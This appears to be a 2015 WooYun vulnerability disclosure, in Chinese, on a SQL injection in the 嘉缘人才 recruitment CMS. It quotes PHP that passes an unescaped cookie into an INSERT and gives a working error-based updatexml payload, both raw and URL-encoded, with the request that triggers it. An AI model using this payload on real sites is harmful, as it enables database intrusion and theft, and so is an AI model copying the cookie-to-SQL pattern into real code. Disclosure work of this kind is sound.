当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098098

漏洞标题:嘉缘人才系统sql注入

相关厂商:finereason.com

漏洞作者: 牛肉包子

提交时间:2015-03-02 11:34

修复时间:2015-06-05 11:37

公开时间:2015-06-05 11:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-07: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-01: 细节向核心白帽子及相关领域专家公开
2015-05-11: 细节向普通白帽子公开
2015-05-21: 细节向实习白帽子公开
2015-06-05: 细节向公众公开

简要描述:

rt

详细说明:

看到看到frcms\inc\ contacts.php

if($companyid!=0){    
    if($hireid!=0){
        $db ->query("update {$cfg['tb_pre']}hire set h_visitcount=h_visitcount+1 where h_id=$hireid and h_comid=$companyid");
        $goto=$cfg['path']."co/hire.php?id=$hireid";
        $rs = $db->get_one("select h_place,h_address,h_post,h_contact,h_telshowflag,h_tel,h_fax,h_emailshowflag,h_email,h_member,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}hire INNER JOIN {$cfg['tb_pre']}member on h_comid=m_id where h_id=$hireid and h_comid=$companyid");
		if($rs){
            $Complace=$rs['h_place'];$Comaddress=$rs['h_address'];$Compost=$rs['h_post'];$Comcontact=$rs['h_contact'];
			$Comtelshowflag=$rs['h_telshowflag'];$Comtel=$rs['h_tel'];$Comfax=$rs['h_fax'];
            $Comemailshowflag=$rs['h_emailshowflag'];$Comemail=$rs['h_email'];$ComMemberlogin=$rs['h_member'];
            $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat'];
		}else{
            echo "联系方式读取出错!";exit;
		}
    }else{
        $db ->query("update {$cfg['tb_pre']}member set m_hits=m_hits+1 where m_id=$companyid");
        $goto=$cfg['path']."co/company.php?id=$companyid";
        $rs = $db->get_one("select m_address,m_post,m_contact,m_telshowflag,m_tel,m_fax,m_emailshowflag,m_email,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}member where m_id=$companyid");
		if($rs){
            $Comaddress=$rs['m_address'];$Compost=$rs['m_post'];$Comcontact=$rs['m_contact'];
			$Comtelshowflag=$rs['m_telshowflag'];$Comtel=$rs['m_tel'];$Comfax=$rs['m_fax'];
            $Comemailshowflag=$rs['m_emailshowflag'];$Comemail=$rs['m_email'];$ComMemberlogin=$rs['m_login'];
            $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat'];
		}else{
            echo "联系方式读取出错!";exit;
		}
    }
    $member_name=_getcookie("user_name");$Show=0;$bid=$hireid!=0?$hireid:$companyid;$type=$hireid!=0?3:2;
    if($username==''){$member_login="访客";$member_name="访客";}else{$member_login=$username;}
$db ->query("Insert into {$cfg['tb_pre']}rbrower(r_bid,r_bmember,r_member,r_adddate,r_name,r_type) values('$bid','$ComMemberlogin','$member_login',NOW(),'$member_name',$type)");


其中$member_name是从_getcookie("user_name")获得。然后进入了sql语句。
查看_getcookie函数

function _getcookie($var) {
	global $cfg;
	$var = $cfg['cookie_pre'].$var;
	return isset($_COOKIE[$var]) ? $_COOKIE[$var] : '';
}


查看全局文件也没发现对cookie的过滤。
然后注册一个真实名字为

=1' updatexml(1,concat(0x7e,(user())),0) or'','1','1','1')#

的用户。

6.jpg


入库之后去除了转义符

8.png


然后访问

http://127.0.0.1/frcms/inc/contacts.php?resumeid=1


7.jpg


可以看到mysql已经报错。其中

fr_user_name==%3D1%27+or+char%28%40%60%27%60%29+or+updatexml%281%2Cconcat%280x7e%2C%28user%28%29%29%29%2C0%29+or%27%27%2C%271%27%2C%271%27%2C%271%27%29%23


这时查看mysql的记录日志可以发现

9.jpg


语句已经成功执行
然后根据我上个洞
WooYun: 嘉缘人才系统最新版注入(无视防御) >
可以知道该cms的mysql错误会储存在一个文件中,以及如何找到这个文件

8.jpg

漏洞证明:

9.jpg


8.jpg

修复方案:

转义

版权声明:转载请注明来源 牛肉包子@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-05 11:37

厂商回复:

最新状态:

暂无